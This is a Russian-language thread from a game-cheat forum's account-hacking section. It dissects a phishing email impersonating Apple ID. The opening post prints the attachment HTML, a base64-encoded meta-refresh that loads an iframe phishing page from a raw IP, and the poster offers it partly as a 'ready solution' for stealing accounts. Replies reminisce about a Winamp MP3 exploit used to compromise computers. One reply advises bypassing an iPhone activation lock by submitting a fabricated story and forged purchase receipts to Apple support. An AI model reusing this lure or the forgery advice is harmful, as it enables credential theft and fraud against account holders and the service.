Логотип игрового форума RF-Cheats.ru    
Новости онлайн игр Правила форума Чёрный рынок Платные услуги Гаранты Арбитраж

Вернуться   Чит портал RF-Cheats.ru - форум читеров и ботоводов в мире онлайн игр > > >
Важная информация

Взлом аккаунтов (Steam, MMO, почта, ICQ, Yandex-деньги и т.п.)

: Взлом аккаунтов яндекс-денег, почты, ICQ, игр, в общем любых сервисов, где требуется регистрация.
Читы и обход фроста для RF Online без хайдаБоты и читы для Perfect World бесплатно без хайдаМоды и читы для World of Tanks (WoT) бесплатно без хайдаМоды и читы для Armored Warfare бесплатно без хайдаБоты и читы для DOTA 2 бесплатно без хайдаБоты и читы для Black Desert Online бесплатно без хайдаЧиты на ArcheAge бесплатно без хайдаЧиты для Warface бесплатно без хайдаВзлом ВКонтакте и ОдноклассниковСписок разделов со всеми играмиЧиты для онлайн игр

 

Ответ
 
Опции темы
Старый 16.03.2016, 08:11   #1
dark
Администратор
Аватар для dark
OFFLINE
Регистрация: 09.04.2007
Сообщений: 951
Благодарностей:
30,933 всего
Мнения: + 17297
Репутация: 99462
Отправить сообщение для dark с помощью ICQ Отправить сообщение для dark с помощью Skype™

Взлом Apple iTunes (apple id) аккаунтов



Способ известный как фишинг. Кто не в курсе, это такой способ взлома, при котором вам тем или иным способом подставляют ложную страницу авторизации (ввода логина и пароля), очень похожую на настоящую (в данном случае страницу apple.com). Кому-то тема будет полезна, чтобы лишний раз отложилась в памяти и спасла в будущем ваши аккаунты от взлома (и не только apple), а кому-то это реальный инструмент отъёма чужих учёток.
Сегодня таким образом пытались взломать меня, выкладываю вам готовое решение.

Итак, к вам приходит письмо (или вы его генерите, отсылаете) якобы от Apple:


Текст письма

Всё красиво, да? Я, честно говоря, даже поверил на секунду и начал читать письмо) Отправитель - appleid@apple.com, хотя ещё в 2000-ом году (когда я начинал всем этим заниматься), подделать отправителя почты было плёвым делом.
Отличить фейк от не фейка можно элементарно:
1. "Hello," - злоумышленник не знает за кем закреплён ваш Apple ID , т.к. атаки как правило не точечные.
2. Достаточно просто посмотреть служебные заголовки письма. А если точнее, то самые первые строчки идентификации:
Цитата:
Delivered-To: dark@rf-cheats.ru
Return-path: <>
Authentication-Results: mxs.mail.ru; spf=fail (mx165.mail.ru: domain of apple.com does not designate 81.169.254.216 as permitted sender) smtp.mailfrom=appleid@apple.com smtp.helo=h2540895
Received-SPF: fail (mx165.mail.ru: domain of apple.com does not designate 81.169.254.216 as permitted sender) client-ip=81.169.254.216; envelope-from=appleid@apple.com; helo=h2540895;
Received: from h2540895.stratoserver.net ([81.169.254.216]:49497 helo=h2540895)
by mx165.mail.ru with esmtp (envelope-from <appleid@apple.com>)
id 1ag39A-00068w-Ie; Wed, 16 Mar 2016 07:33:24 +0300
Вот чёрным по белому написано, что IP отправителя не связан с доменом apple.com. А ниже мы видим хост этого ипшника - h2540895.stratoserver.net. Обычный дедик в Германии. Идём дальше.
В письме предлагается открыть аттач :) На самом деле, скорее это - главное отличие фейка от реального письма. В аттаче лежит файл verified.html весом всего 600 байт. Если юзер не совсем нуб, он может повестись, ведь файл не бинарный, поэтому врядли его там ждёт классический вариант со стиллером. Да и вес не позволяет. Смотрим содержимое файла:

Код HTML:
<html>
<head>
<title>Apple</title>
<meta name="robots" content="noindex,nofollow" />
</head>
<body>


<form align="center">
<meta http-equiv="refresh" content="2; data:text/html;base64,PGh0bWw+DQo8aGVhZD4NCjx0aXRsZT4gQXBwbGUgPC90aXRsZT4NCjxzdHlsZSB0eXBlPSd0ZXh0L2Nzcyc+DQoqDQp7DQoJcGFkZGluZzogMHB4Ow0KCW1hcmdpbjogMHB4Ow0KfQ0KaWZyYW1lDQp7DQoJYm9yZGVyOiAwcHg7DQp9DQo8L3N0eWxlPg0KPC9oZWFkPg0KPGJvZHk+DQo8aWZyYW1lIHNyYz0naHR0cDovLzgxLjE2OS4yMjIuMTE5L351cGRhdGUvdmVyaWZpY2F0aW9uLycgd2lkdGg9JzEwMCUnIGhlaWdodD0iMTAwJSIgPjwvaWZyYW1lPg0KPC9ib2R5Pg0KDQo8L2h0bWw+">

</form>
</body>
<SCRIPT LANGUAGE="JavaScript">
{
document.body.style.overflow='hidden';
}
</script>
</body>
</html>
А внутри мета-данных, закодированная в Base64, лежит ещё одна html-страница, внутри которой фрейм:
Код HTML:
<html>
<head>
<title> Apple </title>
<style type='text/css'>
*
{
	padding: 0px;
	margin: 0px;
}
iframe
{
	border: 0px;
}
</style>
</head>
<body>
<iframe src='http://81.169.222.119/~update/verification/' width='100%' height="100%" ></iframe>
</body>

</html>
В свою очередь во фрейме сама фишинговая страница, на которой вам предложат ввести ваши регистрационные данные:



Если не копать, согласитесь, всё выглядит более чем реально. Письмо от apple и сразу форма авторизации с соответствующим (Эпловским) дизайном. Схема стара как мир, но до сих пор отлично работает.
Мотайте на ус и не ведитесь на подобную хурму.

Последний раз редактировалось dark; 17.04.2017 в 17:13.

Создание читов на заказ | Правила форума | Обмен электронных валют

База данных кидал: blacklist.rf-cheats.ru
Обязательно проверяйте человека через чёрный список прежде чем совершать с ним сделку.
 
Ответить с цитированием
Сказали спасибо:
TRANSIT[Оо] (23.06.2017), voodoo (24.03.2016), hudrogen256 (20.03.2016), EvilzGeniuz (19.03.2016), DIABLOROSSO (17.03.2016), GameOldHack (16.03.2016), PI-BoT (16.03.2016), A.F.I (16.03.2016), m0tr1x (16.03.2016), FLAFFI (16.03.2016), REENK (16.03.2016)


Старый 16.03.2016, 08:15   #2
Paladin
Супер-модератор
Аватар для Paladin
OFFLINE
Регистрация: 22.05.2008
Сообщений: 488
Благодарностей:
18,215 всего
Мнения: + 8041
Репутация: 84870

Не прокатило, ну ладно =(

Цитата:
Никогда "ради мира и спокойствия" не отказывайтесь от собственного опыта и убеждений © Даг Хаммаршельд, политический деятель и лауреат Нобелевской премии мира

База мошенников (обновляемая): blacklist.rf-cheats.ru
(Тема на кидалу есть, а в блэклист его не добавили? Скорее сюда)


[ Скупка Bitcoin, Litecoin, Ethereum ]
[ Ускорение ваших bitcoin-транзакций ]

[ Обновленная версия RF-Cheats ]
 
Ответить с цитированием
Сказали спасибо:
vilvond (25.12.2016), A.F.I (16.03.2016)
Старый 16.03.2016, 08:19   #3
dark
Администратор
Аватар для dark
OFFLINE
Регистрация: 09.04.2007
Сообщений: 951
Благодарностей:
30,933 всего
Мнения: + 17297
Репутация: 99462
Отправить сообщение для dark с помощью ICQ Отправить сообщение для dark с помощью Skype™

Цитата:
Сообщение от Paladin Посмотреть сообщение
Не прокатило, ну ладно =(
Мы в своё время находили переполнения буфера в winamp'е. Через заголовки MP3 файла, через m3u-файлы (Mp3-листы) могли исполнять любой код на машине с winamp. И точно также, если надо было сломать чей-то комп, слали mp3-ёху на почту и надеялись, что у человека винда с винампом)). На это велись такие отцы, что ппц. Ведь кто бы мог подумать, что mp3-файл может быть "заразным"?

Создание читов на заказ | Правила форума | Обмен электронных валют

База данных кидал: blacklist.rf-cheats.ru
Обязательно проверяйте человека через чёрный список прежде чем совершать с ним сделку.
 
Ответить с цитированием
Сказали спасибо:
Antilichnost (04.08.2017), izitwinkwot (13.02.2017), Paladin (25.12.2016), Saint94 (13.05.2016), Entertainment (09.05.2016), hudrogen256 (20.03.2016), A.F.I (16.03.2016)
Старый 16.03.2016, 08:29   #4
REENK
Освоившийся
Аватар для REENK
OFFLINE
Регистрация: 25.06.2014
Сообщений: 40
Благодарностей:
55 всего
Мнения: + 47
Репутация: 166
Отправить сообщение для REENK с помощью Skype™

Цитата:
Сообщение от dark Посмотреть сообщение
Мы в своё время находили переполнения буфера в winamp'е. Через заголовки MP3 файла, через m3u-файлы (Mp3-листы) могли исполнять любой код на машине с winamp. И точно также, если надо было сломать чей-то комп, слали mp3-ёху на почту и надеялись, что у человека винда с винампом)). На это велись такие отцы, что ппц. Ведь кто бы мог подумать, что mp3-файл может быть "заразным"?
Аплодирую стоя

Лучший краб войны!
 
Ответить с цитированием
Сказали спасибо:
Antilichnost (04.08.2017)
Старый 16.03.2016, 09:21   #5
KemiN
Постоялец
Аватар для KemiN
OFFLINE
Регистрация: 16.03.2010
Сообщений: 100
Благодарностей:
60 всего
Мнения: + 1910
Репутация: 181
Отправить сообщение для KemiN с помощью ICQ Отправить сообщение для KemiN с помощью Skype™

А ты им mp3 в ответ

Американский форум - Задаёшь вопрос, потом тебе отвечают.
Израильский форум - Задаёшь вопрос, потом тебе задают вопрос.
Русский форум - Задаёшь вопрос, потом тебе долго рассказывают, какой ты м***к.

_____________________________________________
Skype-ramzes_ik
 
Ответить с цитированием
Сказали спасибо:
GameOldHack (16.03.2016)
Старый 16.03.2016, 16:59   #6
GameOldHack
Подпольщик Tera
Аватар для GameOldHack
OFFLINE
Регистрация: 16.03.2015
Сообщений: 450
Благодарностей:
195 всего
Мнения: + 177
Репутация: 586
Отправить сообщение для GameOldHack с помощью Skype™

Полезная инфа ))) + если кто помнит был такой прикол с видео на ютубе ))
Мол тебя засняли - посмотри что из этого получилось ))
 
Ответить с цитированием
Старый 16.03.2016, 17:21   #7
levgav
Постоялец
Аватар для levgav
OFFLINE
Регистрация: 12.11.2008
Сообщений: 101
Благодарностей:
1,072 всего
Мнения: + 8756
Репутация: 3271

Кто знает как залоченный по эппл айди айфон отвязать? Или только на запчасти?
Айфон именно залочен, просит на почту зайти
 
Ответить с цитированием
Старый 17.03.2016, 17:35   #8
Presta
Подпольщик WoT
Аватар для Presta
OFFLINE
Регистрация: 04.05.2011
Возраст: 27
Сообщений: 221
Благодарностей:
113 всего
Мнения: + 282
Репутация: 340

Цитата:
Сообщение от levgav Посмотреть сообщение
Кто знает как залоченный по эппл айди айфон отвязать? Или только на запчасти?
Айфон именно залочен, просит на почту зайти
Способ есть, но очень геморный. Писать в саппорт с фальшивой и правдопободной историей. Взамен просят скинуть фото коробки твоего устройства и чек с оплатой. С этим проблем нету, скачать/подделать можно. Работает, проверено.

Подпись
 
Ответить с цитированием
Старый 18.03.2016, 23:34   #9
eAx
Освоившийся
Аватар для eAx
OFFLINE
Регистрация: 04.06.2015
Возраст: 30
Сообщений: 52
Благодарностей:
254 всего
Мнения: + 218
Репутация: 763

А я предпочитал дыры Outlook
 
Ответить с цитированием
Старый 01.04.2016, 10:57   #10
Devilry-PvP
Постоялец
Аватар для Devilry-PvP
OFFLINE
Регистрация: 30.10.2013
Возраст: 35
Сообщений: 120
Благодарностей:
15 всего
Мнения: -432
Репутация: 46
Отправить сообщение для Devilry-PvP с помощью Skype™

Цитата:
Сообщение от dark Посмотреть сообщение
Мы в своё время находили переполнения буфера в winamp'е. Через заголовки MP3 файла, через m3u-файлы (Mp3-листы) могли исполнять любой код на машине с winamp. И точно также, если надо было сломать чей-то комп, слали mp3-ёху на почту и надеялись, что у человека винда с винампом)). На это велись такие отцы, что ппц. Ведь кто бы мог подумать, что mp3-файл может быть "заразным"?
ну так давай гайд) А мы там подумаем как его под AIMP сделать
 
Ответить с цитированием
Ответ


Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом Apple Store (Покупаем Бесплатно ВСЕ!) buraymk2 Прошивки/Jailbreak для iOS 45 26.08.2016 14:30
apple watch DIABLOROSSO Общение читеров 6 03.08.2015 11:54
apple/beats Днище Общение читеров 32 23.05.2013 22:56
Расскажите о Apple retrier Общение читеров 67 25.01.2011 18:35

Мир танков | Проект "Армата" | ArcheAge | Black Desert | РФ Онлайн | Айон | Майнкрафт | Браузерные игры
Мир драконов | Р2 Онлайн | Реквием Онлайн | Айка 2 | Роял Квест | ГТА Санадреас | Контра | Дота 2
Мир кораблей | Лига легенд | Arma2 DayZ mod | The War Z | Карос: Начало | Tera Online
Читы для всех Онлайн-игр